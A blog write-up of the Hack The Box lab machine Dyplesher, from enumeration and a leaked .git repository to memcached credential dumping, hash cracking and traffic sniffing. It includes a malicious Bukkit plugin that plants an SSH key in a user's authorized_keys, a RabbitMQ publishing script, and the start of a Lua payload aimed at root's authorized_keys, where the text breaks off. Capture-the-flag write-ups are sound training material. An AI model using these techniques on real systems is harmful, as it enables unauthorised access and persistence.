Blog
Search…
Dyplesher HTB writeup
Could not load image
Dyplesher Image
Dyplesher was my very first Insane Hack The Box machine. Drove me nuts to find an initial foothold and root wasn't much harder than a medium/hard box.

Enum

Enumeration was the part where I spend most of the time, was overlooking into the wrong places and ignored the correct.

NMAP results

Below results of NMAP, we can see SSH, HTTP, RabbitMQ, EPMD Memcached and minecraft-server services running, also an unknown service running on port 3000.
1
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-24 18:11 CEST
2
Initiating Ping Scan at 18:11
3
Scanning 10.10.10.190 [2 ports]
4
Completed Ping Scan at 18:11, 0.04s elapsed (1 total hosts)
5
Initiating Connect Scan at 18:11
6
Scanning 10.10.10.190 [65535 ports]
7
Discovered open port 22/tcp on 10.10.10.190
8
Discovered open port 80/tcp on 10.10.10.190
9
Discovered open port 4369/tcp on 10.10.10.190
10
Discovered open port 25672/tcp on 10.10.10.190
11
Discovered open port 25562/tcp on 10.10.10.190
12
Connect Scan Timing: About 43.48% done; ETC: 18:12 (0:00:40 remaining)
13
Discovered open port 25565/tcp on 10.10.10.190
14
Discovered open port 5672/tcp on 10.10.10.190
15
Discovered open port 3000/tcp on 10.10.10.190
16
Discovered open port 11211/tcp on 10.10.10.190
17
Completed Connect Scan at 18:12, 54.76s elapsed (65535 total ports)
18
Nmap scan report for 10.10.10.190
19
Host is up (0.038s latency).
20
Not shown: 65525 filtered ports, 1 closed port
21
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
22
PORT STATE SERVICE
23
22/tcp open ssh
24
80/tcp open http
25
3000/tcp open ppp
26
4369/tcp open epmd
27
5672/tcp open amqp
28
11211/tcp open memcache
29
25562/tcp open unknown
30
25565/tcp open minecraft
31
25672/tcp open unknown
32
33
Read data files from: /usr/bin/../share/nmap
34
Nmap done: 1 IP address (1 host up) scanned in 54.82 seconds
Copied!
Result of common nmap scripts against open ports.
1
[*] Running NMAP scripts to open ports
2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-24 18:12 CEST
3
Nmap scan report for 10.10.10.190
4
Host is up (0.037s latency).
5
6
PORT STATE SERVICE VERSION
7
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
8
| ssh-hostkey:
9
| 3072 7e:ca:81:78:ec:27:8f:50:60:db:79:cf:97:f7:05:c0 (RSA)
10
| 256 e0:d7:c7:9f:f2:7f:64:0d:40:29:18:e1:a1:a0:37:5e (ECDSA)
11
|_ 256 9f:b2:4c:5c:de:44:09:14:ce:4f:57:62:0b:f9:71:81 (ED25519)
12
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
13
|_http-server-header: Apache/2.4.41 (Ubuntu)
14
|_http-title: Dyplesher
15
3000/tcp open ppp?
16
| fingerprint-strings:
17
| GenericLines, Help:
18
| HTTP/1.1 400 Bad Request
19
| Content-Type: text/plain; charset=utf-8
20
| Connection: close
21
| Request
22
| GetRequest:
23
| HTTP/1.0 200 OK
24
| Content-Type: text/html; charset=UTF-8
25
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
26
| Set-Cookie: i_like_gogs=fb94a4c063bb0bd3; Path=/; HttpOnly
27
| Set-Cookie: _csrf=iJaOmeRYfWmehMyijQzQEZ3Jk706MTU5MDMzNjc3Njg3Njg2NTM0MA%3D%3D; Path=/; Expires=Mon, 25 May 2020 16:12:56 GMT; HttpOnly
28
| Date: Sun, 24 May 2020 16:12:56 GMT
29
| <!DOCTYPE html>
30
| <html>
31
| <head data-suburl="">
32
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
33
| <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
34
| <meta name="author" content="Gogs" />
35
| <meta name="description" content="Gogs is a painless self-hosted Git service" />
36
| <meta name="keywords" content="go, git, self-hosted, gogs">
37
| <meta name="referrer" content="no-referrer" />
38
| <meta name="_csrf" content="iJaOmeRYfWmehMyijQzQEZ3Jk706MTU5MDMzNjc3Njg3Njg2NTM0MA==" />
39
| <meta name="_suburl" content="" />
40
| <meta proper
41
| HTTPOptions:
42
| HTTP/1.0 404 Not Found
43
| Content-Type: text/html; charset=UTF-8
44
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
45
| Set-Cookie: i_like_gogs=86eefb03b61a9160; Path=/; HttpOnly
46
| Set-Cookie: _csrf=HaCJKx5FnpbpoM_whufwZ1x1Nb86MTU5MDMzNjc4MjA4NDk1MTU1MA%3D%3D; Path=/; Expires=Mon, 25 May 2020 16:13:02 GMT; HttpOnly
47
| Date: Sun, 24 May 2020 16:13:02 GMT
48
| <!DOCTYPE html>
49
| <html>
50
| <head data-suburl="">
51
| <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
52
| <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
53
| <meta name="author" content="Gogs" />
54
| <meta name="description" content="Gogs is a painless self-hosted Git service" />
55
| <meta name="keywords" content="go, git, self-hosted, gogs">
56
| <meta name="referrer" content="no-referrer" />
57
| <meta name="_csrf" content="HaCJKx5FnpbpoM_whufwZ1x1Nb86MTU5MDMzNjc4MjA4NDk1MTU1MA==" />
58
| <meta name="_suburl" content="" />
59
|_ <meta
60
4369/tcp open epmd Erlang Port Mapper Daemon
61
| epmd-info:
62
| epmd_port: 4369
63
| nodes:
64
|_ rabbit: 25672
65
5672/tcp open amqp RabbitMQ 3.7.8 (0-9)
66
| amqp-info:
67
| capabilities:
68
| publisher_confirms: YES
69
| exchange_exchange_bindings: YES
70
| basic.nack: YES
71
| consumer_cancel_notify: YES
72
| connection.blocked: YES
73
| consumer_priorities: YES
74
| authentication_failure_close: YES
75
| per_consumer_qos: YES
76
| direct_reply_to: YES
77
| cluster_name: [email protected]
78
| copyright: Copyright (C) 2007-2018 Pivotal Software, Inc.
79
| information: Licensed under the MPL. See http://www.rabbitmq.com/
80
| platform: Erlang/OTP 22.0.7
81
| product: RabbitMQ
82
| version: 3.7.8
83
| mechanisms: PLAIN AMQPLAIN
84
|_ locales: en_US
85
11211/tcp open memcache?
86
25562/tcp open unknown
87
25565/tcp open minecraft?
88
| fingerprint-strings:
89
| DNSStatusRequestTCP, DNSVersionBindReqTCP, LDAPSearchReq, LPDString, SIPOptions, SSLSessionReq, TLSSessionReq, afp, ms-sql-s, oracle-tns:
90
| '{"text":"Unsupported protocol version"}
91
| NotesRPC:
92
| q{"text":"Unsupported protocol version 0, please use one of these versions:
93
|_ 1.8.x, 1.9.x, 1.10.x, 1.11.x, 1.12.x"}
94
25672/tcp open unknown
95
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
96
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
97
98
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
99
Nmap done: 1 IP address (1 host up) scanned in 178.97 seconds
Copied!

Web fuzz results

I first started fuzzing GOGS service, but nothing found so far with with low privileges on it.
After many ours of enumerating all web services with different wordlist, finally got a hit using dirb's common.txt on test.dyplesher.htb
1
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://test.dyplesher.htb/FUZZ -e .txt,.php,.html -t 300 -s
2
3
index.php
4
.hta.txt
5
.git/HEAD
6
.htpasswd
7
server-status
Copied!

Foothold

Knowing we have a .git on test.dyplesher.htb proceeded to dump all info I can with gogitdumper. This tool will download all the git objects and create a new repository in our local machine.
1
$ gogitdumper -u http://test.dyplesher.htb/.git/ -o test/.git/
2
====================
3
GoGitDumper V0.5.2
4
Poorly hacked together by C_Sto
5
====================
6
Error code: 403
7
8
Error during indexing test
9
Downloaded: http://test.dyplesher.htb/.git/index
10
Downloaded: http://test.dyplesher.htb/.git/objects/info/packs
11
Downloaded: http://test.dyplesher.htb/.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
12
Downloaded: http://test.dyplesher.htb/.git/objects/27/29b565f353181a03b2e2edb030a0e2b33d9af0
13
Downloaded: http://test.dyplesher.htb/.git/HEAD
14
Downloaded: http://test.dyplesher.htb/.git/logs/refs/heads/master
15
Downloaded: http://test.dyplesher.htb/.git/config
16
Downloaded: http://test.dyplesher.htb/.git/logs/HEAD
17
Downloaded: http://test.dyplesher.htb/.git/logs/refs/remotes/origin/master
18
Downloaded: http://test.dyplesher.htb/.git/refs/remotes/origin/master
19
Downloaded: http://test.dyplesher.htb/.git/refs/heads/master
20
Downloaded: http://test.dyplesher.htb/.git/COMMIT_EDITMSG
21
Downloaded: http://test.dyplesher.htb/.git/description
22
Downloaded: http://test.dyplesher.htb/.git/hooks/applypatch-msg.sample
23
Downloaded: http://test.dyplesher.htb/.git/hooks/commit-msg.sample
24
Downloaded: http://test.dyplesher.htb/.git/hooks/post-update.sample
25
Downloaded: http://test.dyplesher.htb/.git/hooks/pre-applypatch.sample
26
Downloaded: http://test.dyplesher.htb/.git/hooks/pre-push.sample
27
Downloaded: http://test.dyplesher.htb/.git/hooks/prepare-commit-msg.sample
28
Downloaded: http://test.dyplesher.htb/.git/hooks/pre-rebase.sample
29
Downloaded: http://test.dyplesher.htb/.git/hooks/pre-commit.sample
30
Downloaded: http://test.dyplesher.htb/.git/info/exclude
31
Downloaded: http://test.dyplesher.htb/.git/hooks/pre-receive.sample
32
Downloaded: http://test.dyplesher.htb/.git/hooks/update.sample
33
Downloaded: http://test.dyplesher.htb/.git/objects/b1/fe9eddcdf073dc45bb406d47cde1704f222388
34
Downloaded: http://test.dyplesher.htb/.git/objects/3f/91e452f3cbfa322a3fbd516c5643a6ebffc433
Copied!
Once we have the files locally, we can proceed to see its contents, first checking what files are on stage.
1
$ cd test
2
$ git status
3
On branch master
4
Your branch is up to date with 'origin/master'.
5
6
Changes not staged for commit:
7
(use "git add/rm <file>..." to update what will be committed)
8
(use "git restore <file>..." to discard changes in working directory)
9
deleted: README.md
10
deleted: index.php
11
12
no changes added to commit (use "git add" and/or "git commit -a")
Copied!
As we can see, the repo have two removed files, we can undo them using git checkout --
1
git checkout -- README.md
2
git checkout -- index.php
Copied!
README.md haven't had any useful information, but index.php showed us an auth connection for memcached on port 11211
1
$ cat index.php
2
3
<HTML>
4
<BODY>
5
<h1>Add key and value to memcache<h1>
6
<FORM METHOD="GET" NAME="test" ACTION="">
7
<INPUT TYPE="text" NAME="add">
8
<INPUT TYPE="text" NAME="val">
9
<INPUT TYPE="submit" VALUE="Send">
10
</FORM>
11
12
<pre>
13
<?php
14
if($_GET['add'] != $_GET['val']){
15
$m = new Memcached();
16
$m->setOption(Memcached::OPT_BINARY_PROTOCOL, true);
17
$m->setSaslAuthData("felamos", "XXXXXXXXXXXXX");
18
$m->addServer('127.0.0.1', 11211);
19
$m->add($_GET['add'], $_GET['val']);
20
echo "Done!";
21
}
22
else {
23
echo "its equal";
24
}
25
?>
26
</pre>
27
28
</BODY>
29
</HTML>
Copied!
Also we can see the repository pointing to a remote server, this part give us a clue what could be inside Gogs git server.
1
$ cat .git/config
2
[core]
3
repositoryformatversion = 0
4
filemode = true
5
bare = false
6
logallrefupdates = true
7
[remote "origin"]
8
url = http://localhost:3000/felamos/memcached.git
9
fetch = +refs/heads/*:refs/remotes/origin/*
10
[branch "master"]
11
remote = origin
12
merge = refs/heads/master
13
fatal: this operation must be run in a work tree
Copied!

Memcached enumeration

Now that we have memcached credentials, is time to enumerate and find something useful. As the server is using SASL auth, we cannot use netcat nor telnet. So I installed memcached tools and check the status of the server.
1
$ memcstat --username felamos --password XXXXXXXXX --servers 10.10.10.190
2
Server: 10.10.10.190 (11211)
3
pid: 1
4
uptime: 1756
5
time: 1591198925
6
version: 1.6.5
7
libevent: 2.1.8-stable
8
....
9
....
10
lru_bumps_dropped: 0
Copied!
This confirmed credentials worked, now proceed to check slabs
1
$ memcstat --username felamos --password XXXXXXXXX --servers 10.10.10.190 --args slabs
2
Server: 10.10.10.190 (11211)
3
1:chunk_size: 96
4
1:chunks_per_page: 10922
5
1:total_pages: 1
6
1:total_chunks: 10922
7
1:used_chunks: 1
8
....
9
....
10
active_slabs: 4
11
total_malloced: 4194304
Copied!
Next is to check how many items are stored in the cache, was 4 items in my case.
1
$ memcstat --username felamos --password XXXXXXXXX --servers 10.10.10.190 --args items
2
Server: 10.10.10.190 (11211)
3
items:1:number: 1
4
....
5
items:3:number: 1
6
....
7
items:5:number: 1
8
....
9
items:6:number: 1
10
....
Copied!
Then tried to list the keys, but wasn't able to see then in any way.
At this point tried to guess how the keys would be, tried things like email, user, password.
username key worked and gave us 3 users.
1
$ memccat --debug --username felamos --password XXXXXXXXX --servers 10.10.10.190 username
2
key: username
3
flags: 0length: 24
4
value: MinatoTW
5
felamos
6
yuntao
Copied!
As username worked, tried password and it worked, giving us 3 bcrypt hashes.
1
$ memccat --debug --username felamos --password XXXXXXXXX --servers 10.10.10.190 password
2
key: password
3
flags: 0length: 182
4
value: $2a$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxJa
5
$2y$12$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxQK
6
$2a$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxlS
Copied!
John the ripper gave us 1 password out of the 3 hashes we got.
1
$ john passwd.txt --wordlist=/usr/share/wordlists/rockyou.txt
2
Using default input encoding: UTF-8
3
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
4
Loaded hashes with cost 1 (iteration count) varying from 1024 to 4096
5
Will run 4 OpenMP threads
6
Press 'q' or Ctrl-C to abort, almost any other key for status
7
xxxxxxxx (?)
Copied!

Gogs

Working password was for felamos user on http://10.10.10.190:3000 Gogs service.
Once logged in, we can see there was 2 repositories: memcached with same contents as we downloaded previously in the other web service and a gitlab repository.
We couldn't see anything useful on the repository itself, but there was a release package with a zip file ready to download. http://10.10.10.190:3000/attachments/a1b0e8bb-5843-4d5a-aff4-c7ee283e95f2
At this point, once the zip file downloaded and unzipped. We can locally clone the contents of an existing @hashed directory.
1
$ git clone ./@hashed/6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
2
Cloning into '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'...
3
Receiving objects: 100% (85/85), 30.69 KiB | 30.69 MiB/s, done.
4
Resolving deltas: 100% (40/40), done.
5
6
$ git clone ./@hashed/d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35
7
Cloning into 'd4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35'...
8
Receiving objects: 100% (21/21), 16.98 KiB | 16.98 MiB/s, done.
9
Resolving deltas: 100% (9/9), done.
10
11
$ git clone ./@hashed/4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a
12
Cloning into '4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a'...
13
Receiving objects: 100% (39/39), 10.46 KiB | 10.46 MiB/s, done.
14
Resolving deltas: 100% (12/12), done.
15
16
$ git clone ./@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce
17
Cloning into '4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce'...
18
Receiving objects: 100% (51/51), 20.94 MiB | 102.57 MiB/s, done.
19
Resolving deltas: 100% (5/5), done.
Copied!
So far, there were 4 repositories. After reviewing them we observed that only 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce had things usefull for us.
Checking over the contents of this repository I've found that there was a DB file with users credentials.
1
$ cat 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity/users.db
2
3
�00���ableusersusersCREATE TABLE users (unique_user_id VARCHAR(130) NOT NULL UNIQUE,password VARCHAR(300) NOT NULL,encryption INT,ip VARCHAR(130) NOT NULL))=indexsqlite_autoindex_users_1user��qM�)18fb40a5c8d34f249bb8a689914fcac3$2a$10$Ixxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxc6/192.168.43.81
4
��$M18fb40a5c8d34f249bb8a689914fcac3%
Copied!
After opening the file with an sqlite browser, decrypted the password with john the ripper.
1
$ john db_pass.txt --wordlist=/usr/share/wordlists/rockyou.txt
2
Using default input encoding: UTF-8
3
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
4
Cost 1 (iteration count) is 1024 for all loaded hashes
5
Will run 4 OpenMP threads
6
Press 'q' or Ctrl-C to abort, almost any other key for status
7
xxxxxxxxx (?)
8
1g 0:00:00:07 DONE (2020-06-03 20:02) 0.1404g/s 227.5p/s 227.5c/s 227.5C/s xxxxxxxxx..serena
9
Use the "--show" option to display all of the cracked passwords reliably
10
Session completed
Copied!

Bukkit java plugin

The new credential allowed us to login into http://dyplesher.htb/home/console
At first tried to upload a jar plugin created by msfvenom, it failed due name too large while loading and also because the plugin requires an specific design for the tool consuming it.
Then looked at bukkit.yml in the same repo as users.db file which results is a plugin management for minecraft https://bukkit.gamepedia.com/Main_Page
Main site leads us into a how to write plugins guide https://bukkit.gamepedia.com/Plugin_Tutorial
Next step is to create a new maven project.
1
mvn archetype:generate -DgroupId=htb.dyplesher -DartifactId=xnaaro-plug
Copied!
Once the project had a proper design, followed the guide to write plugins and adapted the required parts for bukkit plugins.
First was pom.xml file. Below is an example of my configuration.
1
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
3
<modelVersion>4.0.0</modelVersion>
4
<groupId>htb.dyplesher</groupId>
5
<artifactId>xnaaro</artifactId>
6
<packaging>jar</packaging>
7
<version>1.2-SNAPSHOT</version>
8
<name>xnaaro</name>
9
<url>http://maven.apache.org</url>
10
<dependencies>
11
<dependency>
12
<groupId>junit</groupId>
13
<artifactId>junit</artifactId>
14
<version>3.8.1</version>
15
<scope>test</scope>
16
</dependency>
17
<dependency>
18
<groupId>org.bukkit</groupId>
19
<artifactId>bukkit</artifactId>
20
<version>1.12.2-R0.1-SNAPSHOT</version><!--change this value depending on the version or use LATEST-->
21
<type>jar</type>
22
<scope>provided</scope>
23
</dependency>
24
<dependency>
25
<groupId>org.spigotmc</groupId>
26
<artifactId>spigot-api</artifactId>
27
<version>1.12.2-R0.1-SNAPSHOT</version><!--change this value depending on the version-->
28
<type>jar</type>
29
<scope>provided</scope>
30
</dependency>
31
</dependencies>
32
<properties>
33
<maven.compiler.source>1.6</maven.compiler.source>
34
<maven.compiler.target>1.6</maven.compiler.target>
35
</properties>
36
<repositories>
37
<repository>
38
<id>bukkit-repo</id>
39
<url>https://hub.spigotmc.org/nexus/content/repositories/snapshots/</url>
40
</repository>
41
</repositories>
42
<build>
43
<plugins>
44
<plugin>
45
<!-- Build an executable JAR -->
46
<groupId>org.apache.maven.plugins</groupId>
47
<artifactId>maven-jar-plugin</artifactId>
48
<version>3.1.0</version>
49
<configuration>
50
<archive>
51
<manifest>
52
<addClasspath>true</addClasspath>
53
<classpathPrefix>lib/</classpathPrefix>
54
<mainClass>htb.dyplesher.App</mainClass>
55
</manifest>
56
</archive>
57
</configuration>
58
</plugin>
59
</plugins>
60
</build>
61
</project>
Copied!
Second is src/main/resources/plugin.yml file which is where bukkit will read plugin name and what java class will load as main.
1
name: xnaaro
2
main: htb.dyplesher.Xnaaro
3
version: 1.0.2
Copied!
Last file is src/main/java/htb/dyplesher.Xnaaro.java. This is the file where the actual java code with our RCE commands will be.
It requires to load JavaPlugin and extends its main class with it.
Our RCE code will be executed while loading/enabling the plugin.
At first tried to get a reverse shell, but it didn't work as expected because there was a firewall in the box blocking outgoing connections.
After enumerating sometime the box, saw the commands were running as MinatoTW user.
So, just added my SSH key into his authorized_keys file.
1
package htb.dyplesher;
2
3
import org.bukkit.plugin.java.JavaPlugin;
4
import java.io.FileWriter;
5
import java.io.IOException;
6
7
public class Xnaaro extends JavaPlugin {
8
9
@Override
10
public void onDisable() {
11
System.out.println ("Plugin disabled");
12
}
13
14
@Override
15
public void onEnable() {
16
try {
17
FileWriter myWriter = new FileWriter("/home/MinatoTW/.ssh/authorized_keys");
18
myWriter.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+P7qV7kjQ7RaxUNNeAlQkREHCUKW1kXitmHwdrpDZ+MZlfmZmYPJ75A+/m/S6JVS4qi8oCXthZX06j0x1oaGrKAsoYSuMMU+eN40gp+9I2IaPglv0407yL4fJMqy0jnb9ID+g5c+OTTH8q7tQ0wvcFLZpOnnbHVp2Autgb9Plx4fppNAQcHn11VBXTv+e48RKcC44gJULVhqp8eB8lT5O2pT5aHP58s3dggTMn5rwzxK7k6jT638rHNWUM84WhepzQb9dE3NYLX2RRdshBIIfqVeIUZfxWg5fcLjgTfdV7lb4zrJbS9KXH8UWb8NSfM73Pwy3mSFSdtNC59qTZEiN838bBSJbFtcBj8aVHWrdEjowGBzv8yYcrLC7tpFZyHxLsQsenOf/MTUKtqrqQq/tRVwcwhbYHXH2fIcU1x+pEI8qxpLHR64fiynxwrnVP/FSGchvvX3hnzkdDE3g51lvMhpkAxX30aqwd1Hmqs8YRYVA43atczbLo1TaNto3QkU= [email protected]");
19
myWriter.close();
20
} catch (IOException e) {
21
System.out.println("An error occurred.");
22
e.printStackTrace();
23
}
24
}
25
}
Copied!
Finally, create a .jar package with maven
1
mvn package
Copied!
In order to raise the RCE, first we need to upload the plugin package and then enable it in the GUI. In the plugin list the name was a long hash, but using plugin name xnaaro in my case, properly executed it.
And we have ssh access to minatotw user.
1
$ ssh [email protected] -i id_rsa
2
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)
3
4
* Documentation: https://help.ubuntu.com
5
* Management: https://landscape.canonical.com
6
* Support: https://ubuntu.com/advantage
7
8
System information disabled due to load higher than 2.0
9
10
11
57 updates can be installed immediately.
12
0 of these updates are security updates.
13
To see these additional updates run: apt list --upgradable
14
15
16
Last login: Wed May 20 13:44:56 2020 from 10.10.14.4
Copied!

Felamos user

After enumerating a couple of things, saw minato user was in wireshark group.
1
[email protected]:~$ cat /etc/group | grep -i minato
2
MinatoTW:x:1001:
3
wireshark:x:122:MinatoTW
Copied!
As there is rabbitmq and memcached running, we may be able to intercept something useful from it.
1
[email protected]:~$ tshark -ni any -w data.pcap
2
Capturing on 'any'
3
427
Copied!
Downloaded the .pcap file to my local.
1
$ scp -i id_rsa [email protected]:data.pcap .
2
data.pcap 100% 50KB 474.6KB/s 00:00
Copied!
And looked at the contents, we where able to find some auth strings.
1
$ tcpick -C -yP -r data2.pcap | grep subscribers
2
...subscribers.direct......
3
........2.....sub.subscribers.......
4
........<.(...subscribers......... .<.............application/json.........{"name":"Mafalda Wuckert I","email":"[email protected]","address":"84889 Mayert Coves Apt. 784\nEast Tabithahaven, CO 07102","password":"B9YXOT2VmiDh","subscribed":true}.
5
........<.(...subscribers......... .<.............application/json.........{"name":"Berenice Hill","email":"[email protected]","address":"237 Frank Trail Suite 931\nDareside, SD 21507","password":"B9YXOT2VmiDh","subscribed":true}.
6
........<.(...subscribers......... .<.............application/json.........{"name":"Dr. Hailie Gleichner","email":"[email protected]","address":"47786 Koelpin Hills\nNew Abigailshire, NC 91337","password":"B9YXOT2VmiDh","subscribed":true}.
7
........<.(...subscribers......... .<.............application/json.........{"name":"Francis Glover","email":"[email protected]","address":"872 Wilton Land\nLauraview, PA 54556","password":"B9YXOT2VmiDh","subscribed":true}.
8
........<.(...subscribers......... .<.............application/json.........{"name":"Ryann Quigley","email":"[email protected]","address":"925 Ritchie Harbor\nWest Esperanza, FL 50235-9309","password":"B9YXOT2VmiDh","subscribed":true}.
9
........<.(...subscribers......... .<.............application/json.........{"name":"Peyton Reynolds","email":"[email protected]","address":"644 Bauch Spur\nNew Mustafa, OH 10892","password":"B9YXOT2VmiDh","subscribed":true}.
10
........<.(...subscribers......... .<.............application/json.........{"name":"Prof. Catalina Kessler IV","email":"[email protected]","address":"8527 Scottie Neck\nPort Charlie, WV 87089","password":"B9YXOT2VmiDh","subscribed":true}.
11
........<.(...subscribers......... .<.............application/json.........{"name":"Dr. Roselyn Ebert","email":"[email protected]","address":"9225 Zulauf Plaza Suite 751\nEast Obiemouth, PA 90425-1897","password":"B9YXOT2VmiDh","subscribed":true}.
12
........<.(...subscribers......... .<.............application/json.........{"name":"Edgar Osinski","email":"[email protected]","address":"92938 Toy Lock Suite 064\nNew Rossie, MT 63835","password":"B9YXOT2VmiDh","subscribed":true}.
13
........<.(...subscribers......... .<.............application/json.........{"name":"Gennaro Romaguera","email":"[email protected]","address":"39874 Serena Extensions Apt. 100\nEmanuelborough, MD 38535-4626","password":"B9YXOT2VmiDh","subscribed":true}.
14
........<.(...subscribers......... .<.............application/json.........{"name":"Gennaro Romaguera","email":"[email protected]","address":"39874 Serena Extensions Apt. 100\nEmanuelborough, MD 38535-4626","password":"B9YXOT2VmiDh","subscribed":true}.
15
........<.(...subscribers......... .<.........q...application/json........q{"name":"MinatoTW","email":"[email protected]","address":"India","password":"bixxxxxxFov","subscribed":true}.
16
........<.(...subscribers......... .<.........l...application/json........l{"name":"yuntao","email":"[email protected]","address":"Italy","password":"waxxxxxxob","subscribed":true}.
17
........<.(...subscribers......... .<.........p...application/json........p{"name":"felamos","email":"[email protected]","address":"India","password":"tixxxxxxxxxg","subscribed":true}.
Copied!
Credentials worked for felamos and yuntao users.
2
[email protected]'s password:
3
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-46-generic x86_64)
4
5
* Documentation: https://help.ubuntu.com
6
* Management: https://landscape.canonical.com
7
* Support: https://ubuntu.com/advantage
8
9
System information as of Fri 05 Jun 2020 02:39:08 PM UTC
10
11
System load: 0.0 Processes: 254
12
Usage of /: 6.9% of 97.93GB Users logged in: 1
13
Memory usage: 33% IP address for ens33: 10.10.10.190
14
Swap usage: 0% IP address for docker0: 172.17.0.1
15
16
17
57 updates can be installed immediately.
18
0 of these updates are security updates.
19
To see these additional updates run: apt list --upgradable
20
21
Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings
22
23
24
Last login: Thu Apr 23 17:33:41 2020 from 192.168.0.103
26
uid=1000(felamos) gid=1000(felamos) groups=1000(felamos)
27
[email protected]:~$ cat user.txt
28
a2ff93xxxxxxxxxxxxxxxxxxx
Copied!

Cuberite

Once inside felamos $HOME directory we can see a file with some information on what to focus and how to do it.
It refers to some service that read on the rabbitmq queues and open an URL.
1
[email protected]:~$ cat yuntao/send.sh
2
#!/bin/bash
3
4
echo 'Hey yuntao, Please publish all cuberite plugins created by players on plugin_data "Exchange" and "Queue". Just send url to download plugins and our new code will review it and working plugins will be added to the server.' > /dev/pts/{}
Copied!
Checking running processes we can observe an interesting one executing something called Cuberite.
1
2
PID TTY STAT TIME COMMAND
3
995 tty1 Ss+ 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
4
1017 pts/1 Ssl+ 0:18 /home/MinatoTW/Cuberite/Cuberite
5
1026 pts/2 Ssl+ 2:47 /usr/bin/java -Xms512M -Xmx512M -jar paper.jar
6
2167 pts/0 Ss+ 0:00 /usr/bin/php /root/work/com.php
7
3657 pts/4 Ss 0:00 -bash
8
4594 pts/4 S 0:00 bash
9
20468 pts/4 R+ 0:00 ps a
Copied!
Investigated a bit what the services was doing and what languages uses it, found out that the plugins were written with lua programming language. https://book.cuberite.org/#0.1
At first tried to read queues, but auth was required. Looking at the previous captured .pcap file, I was able to see another credential for AMQP.
1
. .....capabilitiesF.....publisher_confirmst..exchange_exchange_bindingst.
2
basic.nackt..consumer_cancel_notifyt..connection.blockedt..consumer_prioritiest..authentication_failure_closet..per_consumer_qost..direct_reply_tot..cluster_nameS....[email protected] copyrightS....Copyright (C) 2007-2018 Pivotal Software, Inc..informationS...5Licensed under the MPL. See http://www.rabbitmq.com/.platformS....Erlang/OTP 22.0.7.productS....RabbitMQ.versionS....3.7.8....PLAIN AMQPLAIN....en_US.
3
......=.
4
.......productS....AMQPLib.platformS....PHP.versionS....2.11.1.informationS.... copyrightS.....capabilitiesF.....authentication_failure_closet..publisher_confirmst..consumer_cancel_notifyt..exchange_exchange_bindingst.
5
ExxxxxxxxxxxOp.en_US.ion.blockedt..AMQPLAIN...,.LOGINS....yuntao.PASSWORDS...
Copied!
Then wrote a python script to connect rabbitmq and send a message into the queue. Used this guide to write the code https://www.rabbitmq.com/tutorials/tutorial-one-python.html
Cuberite was expecting an URL in the message and outgoing connections was blocked by the firewall.
Our only option was to use a hosted service inside the box and point the URL to localhost.
1
import pika
2
credentials = pika.PlainCredentials('yuntao', 'Exxxxxxxxxxxxp')
3
parameters = pika.ConnectionParameters('10.10.10.190', 5672, '/', credentials)
4
connection = pika.BlockingConnection(parameters)
5
body = 'http://127.0.0.1:4443/exploit.lua'
6
channel = connection.channel()
7
8
channel.queue_declare(queue='plugin_data',
9
durable=True)
10
11
channel.basic_publish(exchange='',
12
routing_key='plugin_data',
13
body=body)
14
connection.close()
Copied!
Contents of the lua exploit inside the box.
Method was the same as for the low privileged shell, copy our SSH key into root's authorized_keys
1
file = io.open("/root/.ssh/authorized_keys", "w")
2
